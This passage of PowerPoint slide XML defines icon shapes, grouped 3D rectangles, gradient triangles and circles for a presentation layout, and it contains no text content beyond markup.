                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
